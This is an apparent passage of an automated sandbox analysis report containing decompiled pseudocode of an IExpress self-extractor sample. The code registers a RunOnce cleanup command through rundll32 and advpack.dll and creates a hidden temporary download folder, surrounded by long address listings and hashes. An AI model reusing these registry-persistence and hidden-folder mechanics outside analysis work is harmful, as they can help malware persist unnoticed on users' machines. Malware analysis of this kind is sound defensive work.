                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3192549508-0
                                                                                                                                                                                                        • Opcode ID: 754b1015d513fd0f1047f5a771b81ecab3aa5dfa3971aa1b41e66296c04cca6b
                                                                                                                                                                                                        • Instruction ID: 833d1af2110021ee179f98b3dc40422cb1ca26a9cc62ba3fc3be2bae093fe737
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 754b1015d513fd0f1047f5a771b81ecab3aa5dfa3971aa1b41e66296c04cca6b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 059002642621005B96101BB0AD1D8A979D15A6E602F8195A0A015C4494DF6040909512
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0021202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185registrylibrarymemoryCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E0021202A(struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v268;
				char _v528;
				void* _v532;
				int _v536;
				int _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				long _t36;
				long _t41;
				struct HINSTANCE__* _t46;
				intOrPtr _t49;
				intOrPtr _t50;
				CHAR* _t54;
				void _t56;
				signed int _t66;
				intOrPtr* _t72;
				void* _t73;
				void* _t75;
				void* _t80;
				intOrPtr* _t81;
				void* _t86;
				void* _t87;
				void* _t90;
				_Unknown_base(*)()* _t91;
				signed int _t93;
				void* _t94;
				void* _t95;

				_t79 = __edx;
				_t28 =  *0x218004; // 0x58ac7c6d
				_v8 = _t28 ^ _t93;
				_t84 = 0x104;
				memset( &_v268, 0, 0x104);
				memset( &_v528, 0, 0x104);
				_t95 = _t94 + 0x18;
				_t66 = 0;
				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
				if(_t36 != 0) {
					L24:
					return E00216CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
				}
				_push(_t86);
				_t87 = 0;
				while(1) {
					E0021171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
					_t95 = _t95 + 0x10;
					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
					if(_t41 != 0) {
						break;
					}
					_t87 = _t87 + 1;
					if(_t87 < 0xc8) {
						continue;
					}
					break;
				}
				if(_t87 != 0xc8) {
					GetSystemDirectoryA( &_v528, _t84);
					_t79 = _t84;
					E0021658A( &_v528, _t84, "advpack.dll");
					_t46 = LoadLibraryA( &_v528); // executed
					_t84 = _t46;
					if(_t84 == 0) {
						L10:
						if(GetModuleFileNameA( *0x219a3c,  &_v268, 0x104) == 0) {
							L17:
							_t36 = RegCloseKey(_v532);
							L23:
							_pop(_t86);
							goto L24;
						}
						L11:
						_t72 =  &_v268;
						_t80 = _t72 + 1;
						do {
							_t49 =  *_t72;
							_t72 = _t72 + 1;
						} while (_t49 != 0);
						_t73 = _t72 - _t80;
						_t81 = 0x2191e4;
						do {
							_t50 =  *_t81;
							_t81 = _t81 + 1;
						} while (_t50 != 0);
						_t84 = _t73 + 0x50 + _t81 - 0x2191e5;
						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x2191e5);
						if(_t90 != 0) {
							 *0x218580 = _t66 ^ 0x00000001;
							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
							if(_t66 == 0) {
								_t54 = "%s /D:%s";
							}
							_push("C:\Users\hardz\AppData\Local\Temp\IXP001.TMP\");
							E0021171E(_t90, _t84, _t54,  &_v268);
							_t75 = _t90;
							_t23 = _t75 + 1; // 0x1
							_t79 = _t23;
							do {
								_t56 =  *_t75;
								_t75 = _t75 + 1;
							} while (_t56 != 0);
							_t24 = _t75 - _t79 + 1; // 0x2
							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
							RegCloseKey(_v532); // executed
							_t36 = LocalFree(_t90);
							goto L23;
						}
						_t79 = 0x4b5;
						E002144B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
						goto L17;
					}
					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
					_t66 = 0 | _t91 != 0x00000000;
					FreeLibrary(_t84); // executed
					if(_t91 == 0) {
						goto L10;
					}
					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
						E0021658A( &_v268, 0x104, 0x211140);
					}
					goto L11;
				}
				_t36 = RegCloseKey(_v532);
				 *0x218530 = _t66;
				goto L23;
			}

































                                                                                                                                                                                                        0x0021202a
                                                                                                                                                                                                        0x00212035
                                                                                                                                                                                                        0x0021203c
                                                                                                                                                                                                        0x00212041
                                                                                                                                                                                                        0x00212050
                                                                                                                                                                                                        0x0021205f
                                                                                                                                                                                                        0x00212064
                                                                                                                                                                                                        0x0021206f
                                                                                                                                                                                                        0x0021208c
                                                                                                                                                                                                        0x00212094
                                                                                                                                                                                                        0x00212257
                                                                                                                                                                                                        0x00212266
                                                                                                                                                                                                        0x00212266
                                                                                                                                                                                                        0x0021209a
                                                                                                                                                                                                        0x0021209b
                                                                                                                                                                                                        0x0021209d
                                                                                                                                                                                                        0x002120aa
                                                                                                                                                                                                        0x002120af
                                                                                                                                                                                                        0x002120c9
                                                                                                                                                                                                        0x002120d1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002120d3
                                                                                                                                                                                                        0x002120da
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002120da
                                                                                                                                                                                                        0x002120e2
                                                                                                                                                                                                        0x00212103
                                                                                                                                                                                                        0x0021210e
                                                                                                                                                                                                        0x00212116
                                                                                                                                                                                                        0x00212122
                                                                                                                                                                                                        0x00212128
                                                                                                                                                                                                        0x0021212c
                                                                                                                                                                                                        0x00212179
                                                                                                                                                                                                        0x00212194
                                                                                                                                                                                                        0x002121de
                                                                                                                                                                                                        0x002121e4
                                                                                                                                                                                                        0x00212256
                                                                                                                                                                                                        0x00212256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212256
                                                                                                                                                                                                        0x00212196
                                                                                                                                                                                                        0x00212196
                                                                                                                                                                                                        0x0021219c
                                                                                                                                                                                                        0x0021219f
                                                                                                                                                                                                        0x0021219f
                                                                                                                                                                                                        0x002121a1
                                                                                                                                                                                                        0x002121a2
                                                                                                                                                                                                        0x002121a6
                                                                                                                                                                                                        0x002121a8
                                                                                                                                                                                                        0x002121b0
                                                                                                                                                                                                        0x002121b0
                                                                                                                                                                                                        0x002121b2
                                                                                                                                                                                                        0x002121b3
                                                                                                                                                                                                        0x002121bc
                                                                                                                                                                                                        0x002121c7
                                                                                                                                                                                                        0x002121cb
                                                                                                                                                                                                        0x002121f1
                                                                                                                                                                                                        0x002121f6
                                                                                                                                                                                                        0x002121fd
                                                                                                                                                                                                        0x002121ff
                                                                                                                                                                                                        0x002121ff
                                                                                                                                                                                                        0x00212204
                                                                                                                                                                                                        0x00212213
                                                                                                                                                                                                        0x00212218
                                                                                                                                                                                                        0x0021221d
                                                                                                                                                                                                        0x0021221d
                                                                                                                                                                                                        0x00212220
                                                                                                                                                                                                        0x00212220
                                                                                                                                                                                                        0x00212222
                                                                                                                                                                                                        0x00212223
                                                                                                                                                                                                        0x00212229
                                                                                                                                                                                                        0x0021223d
                                                                                                                                                                                                        0x00212249
                                                                                                                                                                                                        0x00212250
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212250
                                                                                                                                                                                                        0x002121d2
                                                                                                                                                                                                        0x002121d9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002121d9
                                                                                                                                                                                                        0x0021213a
                                                                                                                                                                                                        0x00212141
                                                                                                                                                                                                        0x00212144
                                                                                                                                                                                                        0x0021214c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212163
                                                                                                                                                                                                        0x00212172
                                                                                                                                                                                                        0x00212172
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00212163
                                                                                                                                                                                                        0x002120ea
                                                                                                                                                                                                        0x002120f0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • memset.MSVCRT ref: 00212050
                                                                                                                                                                                                        • memset.MSVCRT ref: 0021205F
                                                                                                                                                                                                        • RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0021208C
                                                                                                                                                                                                          • Part of subcall function 0021171E: _vsnprintf.MSVCRT ref: 00211750
                                                                                                                                                                                                        • RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002120C9
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002120EA
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00212103
                                                                                                                                                                                                        • LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00212122
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00212134
                                                                                                                                                                                                        • FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00212144
                                                                                                                                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 0021215B
                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0021218C
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002121C1
                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 002121E4
                                                                                                                                                                                                        • RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0021223D
                                                                                                                                                                                                        • RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00212249
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00212250
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                                                                                                        • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
                                                                                                                                                                                                        • API String ID: 178549006-850274211
                                                                                                                                                                                                        • Opcode ID: b4cdc473682922ecfed4a885e45fa049faaaa7a400add232bf49e09fab2847db
                                                                                                                                                                                                        • Instruction ID: ca3a63701e5f1d4541fdd4dae620b37b17beb855e2ba682204bdd12db5052156
                                                                                                                                                                                                        • Opcode Fuzzy Hash: b4cdc473682922ecfed4a885e45fa049faaaa7a400add232bf49e09fab2847db
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42510571921214BBDB209F60EC4DFFB77BDEB75700F0041A4BA49A2151DE718EE98A50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 002155A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248memorystringCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 232 2155a0-2155d9 call 21468f LocalAlloc 235 2155db-2155f1 call 2144b9 call 216285 232->235 236 2155fd-21560c call 21468f 232->236 251 2155f6-2155f8 235->251 241 215632-215643 lstrcmpA 236->241 242 21560e-215630 call 2144b9 LocalFree 236->242 245 215645 241->245 246 21564b-215659 LocalFree 241->246 242->251 245->246 249 215696-21569c 246->249 250 21565b-21565d 246->250 252 2156a2-2156a8 249->252 253 21589f-2158b5 call 216517 249->253 254 215669 250->254 255 21565f-215667 250->255 256 2158b7-2158c7 call 216ce0 251->256 252->253 258 2156ae-2156c1 GetTempPathA 252->258 253->256 259 21566b-21567a call 215467 254->259 255->254 255->259 262 2156f3-215711 call 211781 258->262 263 2156c3-2156c9 call 215467 258->263 270 215680-215691 call 2144b9 259->270 271 21589b-21589d 259->271 275 215717-215729 GetDriveTypeA 262->275 276 21586c-215890 GetWindowsDirectoryA call 21597d 262->276 269 2156ce-2156d0 263->269 269->271 273 2156d6-2156df call 212630 269->273 270->251 271->256 273->262 288 2156e1-2156ed call 215467 273->288 277 215730-215740 GetFileAttributesA 275->277 278 21572b-21572e 275->278 276->262 289 215896 276->289 282 215742-215745 277->282 283 21577e-21578f call 21597d 277->283 278->277 278->282 286 215747-21574f 282->286 287 21576b 282->287 298 215791-21579e call 212630 283->298 299 2157b2-2157bf call 212630 283->299 291 215771-215779 286->291 292 215751-215753 286->292 287->291 288->262 288->271 289->271 296 215864-215866 291->296 292->291 295 215755-215762 call 216952 292->295 295->287 309 215764-215769 295->309 296->275 296->276 298->287 306 2157a0-2157b0 call 21597d 298->306 307 2157c1-2157cd GetWindowsDirectoryA 299->307 308 2157d3-2157f8 call 21658a GetFileAttributesA 299->308 306->287 306->299 307->308 314 21580a 308->314 315 2157fa-215808 CreateDirectoryA 308->315 309->283 309->287 316 21580d-21580f 314->316 315->316 317 215811-215825 316->317 318 215827-21585c SetFileAttributesA call 211781 call 215467 316->318 317->296 318->271 323 21585e 318->323 323->296
                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E002155A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x218004; // 0x58ac7c6d
				_v8 = _t28 ^ _t110;
				_t2 = E0021468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0021468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x219a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x218b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x218a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00216517(_t82, 0x7d2, 0, E00213210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x219a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x2191e4;
									_t40 = GetTempPathA(0x104, 0x2191e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00211781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00216952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0021597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00212630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0021658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x2191e4;
																					E00211781(0x2191e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00215467(0x2191e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00212630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0021597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00215467(0x2191e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x2191e4;
											_t70 = E00212630(0, 0x2191e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x2191e4;
												_t71 = E00215467(0x2191e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0021597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x218b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00215467(0x218b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E002144B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E002144B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x219124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E002144B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x219124 = E00216285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00216CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}





































                                                                                                                                                                                                        0x002155ab
                                                                                                                                                                                                        0x002155b2
                                                                                                                                                                                                        0x002155c9
                                                                                                                                                                                                        0x002155d5
                                                                                                                                                                                                        0x002155d9
                                                                                                                                                                                                        0x00215600
                                                                                                                                                                                                        0x00215605
                                                                                                                                                                                                        0x0021560a
                                                                                                                                                                                                        0x0021560c
                                                                                                                                                                                                        0x00215638
                                                                                                                                                                                                        0x00215641
                                                                                                                                                                                                        0x00215643
                                                                                                                                                                                                        0x00215645
                                                                                                                                                                                                        0x00215645
                                                                                                                                                                                                        0x0021564c
                                                                                                                                                                                                        0x00215652
                                                                                                                                                                                                        0x00215657
                                                                                                                                                                                                        0x00215659
                                                                                                                                                                                                        0x00215696
                                                                                                                                                                                                        0x0021569c
                                                                                                                                                                                                        0x0021589f
                                                                                                                                                                                                        0x002158a7
                                                                                                                                                                                                        0x002158ac
                                                                                                                                                                                                        0x002158b3
                                                                                                                                                                                                        0x002158b5
                                                                                                                                                                                                        0x002156a2
                                                                                                                                                                                                        0x002156a2
                                                                                                                                                                                                        0x002156a8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002156ae
                                                                                                                                                                                                        0x002156ae
                                                                                                                                                                                                        0x002156b9
                                                                                                                                                                                                        0x002156bf
                                                                                                                                                                                                        0x002156c1
                                                                                                                                                                                                        0x002156f3
                                                                                                                                                                                                        0x002156f3
                                                                                                                                                                                                        0x00215705
                                                                                                                                                                                                        0x0021570a
                                                                                                                                                                                                        0x00215711
                                                                                                                                                                                                        0x00215717
                                                                                                                                                                                                        0x00215724
                                                                                                                                                                                                        0x00215726
                                                                                                                                                                                                        0x00215729
                                                                                                                                                                                                        0x00215730
                                                                                                                                                                                                        0x00215737
                                                                                                                                                                                                        0x0021573d
                                                                                                                                                                                                        0x00215740
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021572b
                                                                                                                                                                                                        0x0021572b
                                                                                                                                                                                                        0x0021572e
                                                                                                                                                                                                        0x00215742
                                                                                                                                                                                                        0x00215742
                                                                                                                                                                                                        0x00215745
                                                                                                                                                                                                        0x0021576b
                                                                                                                                                                                                        0x0021576b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215747
                                                                                                                                                                                                        0x00215747
                                                                                                                                                                                                        0x0021574d
                                                                                                                                                                                                        0x0021574f
                                                                                                                                                                                                        0x00215771
                                                                                                                                                                                                        0x00215771
                                                                                                                                                                                                        0x00215773
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215751
                                                                                                                                                                                                        0x00215751
                                                                                                                                                                                                        0x00215753
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215755
                                                                                                                                                                                                        0x0021575b
                                                                                                                                                                                                        0x00215760
                                                                                                                                                                                                        0x00215762
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215764
                                                                                                                                                                                                        0x00215764
                                                                                                                                                                                                        0x00215769
                                                                                                                                                                                                        0x0021577e
                                                                                                                                                                                                        0x0021577e
                                                                                                                                                                                                        0x00215781
                                                                                                                                                                                                        0x00215788
                                                                                                                                                                                                        0x0021578d
                                                                                                                                                                                                        0x0021578f
                                                                                                                                                                                                        0x002157b2
                                                                                                                                                                                                        0x002157b8
                                                                                                                                                                                                        0x002157bd
                                                                                                                                                                                                        0x002157bf
                                                                                                                                                                                                        0x002157cd
                                                                                                                                                                                                        0x002157cd
                                                                                                                                                                                                        0x002157dd
                                                                                                                                                                                                        0x002157e3
                                                                                                                                                                                                        0x002157ef
                                                                                                                                                                                                        0x002157f5
                                                                                                                                                                                                        0x002157f8
                                                                                                                                                                                                        0x0021580a
                                                                                                                                                                                                        0x0021580a
                                                                                                                                                                                                        0x002157fa
                                                                                                                                                                                                        0x00215802
                                                                                                                                                                                                        0x00215802
                                                                                                                                                                                                        0x0021580d
                                                                                                                                                                                                        0x0021580f
                                                                                                                                                                                                        0x00215830
                                                                                                                                                                                                        0x00215836
                                                                                                                                                                                                        0x0021583d
                                                                                                                                                                                                        0x0021584b
                                                                                                                                                                                                        0x00215851
                                                                                                                                                                                                        0x00215855
                                                                                                                                                                                                        0x0021585a
                                                                                                                                                                                                        0x0021585c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021585e
                                                                                                                                                                                                        0x0021585e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021585e
                                                                                                                                                                                                        0x00215811
                                                                                                                                                                                                        0x00215817
                                                                                                                                                                                                        0x00215819
                                                                                                                                                                                                        0x0021581f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021581f
                                                                                                                                                                                                        0x00215791
                                                                                                                                                                                                        0x00215797
                                                                                                                                                                                                        0x0021579c
                                                                                                                                                                                                        0x0021579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002157a0
                                                                                                                                                                                                        0x002157a9
                                                                                                                                                                                                        0x002157ae
                                                                                                                                                                                                        0x002157b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002157b0
                                                                                                                                                                                                        0x0021579e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215769
                                                                                                                                                                                                        0x00215762
                                                                                                                                                                                                        0x00215753
                                                                                                                                                                                                        0x0021574f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021572e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215864
                                                                                                                                                                                                        0x00215864
                                                                                                                                                                                                        0x00215864
                                                                                                                                                                                                        0x00215717
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002156c3
                                                                                                                                                                                                        0x002156c5
                                                                                                                                                                                                        0x002156c9
                                                                                                                                                                                                        0x002156ce
                                                                                                                                                                                                        0x002156d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002156d6
                                                                                                                                                                                                        0x002156d6
                                                                                                                                                                                                        0x002156d8
                                                                                                                                                                                                        0x002156dd
                                                                                                                                                                                                        0x002156df
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002156e1
                                                                                                                                                                                                        0x002156e2
                                                                                                                                                                                                        0x002156e4
                                                                                                                                                                                                        0x002156e6
                                                                                                                                                                                                        0x002156eb
                                                                                                                                                                                                        0x002156ed
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x002156f3
                                                                                                                                                                                                        0x002156f3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0021586c
                                                                                                                                                                                                        0x00215878
                                                                                                                                                                                                        0x0021587e
                                                                                                                                                                                                        0x00215882
                                                                                                                                                                                                        0x00215883
                                                                                                                                                                                                        0x00215889
                                                                                                                                                                                                        0x0021588e
                                                                                                                                                                                                        0x0021588e
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215896
                                                                                                                                                                                                        0x002156ed
                                                                                                                                                                                                        0x002156df
                                                                                                                                                                                                        0x002156d0
                                                                                                                                                                                                        0x002156c1
                                                                                                                                                                                                        0x002156a8
                                                                                                                                                                                                        0x0021565b
                                                                                                                                                                                                        0x0021565b
                                                                                                                                                                                                        0x0021565d
                                                                                                                                                                                                        0x00215669
                                                                                                                                                                                                        0x00215669
                                                                                                                                                                                                        0x0021565f
                                                                                                                                                                                                        0x0021565f
                                                                                                                                                                                                        0x00215665
                                                                                                                                                                                                        0x00215667
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00215667
                                                                                                                                                                                                        0x0021566c
                                                                                                                                                                                                        0x00215673
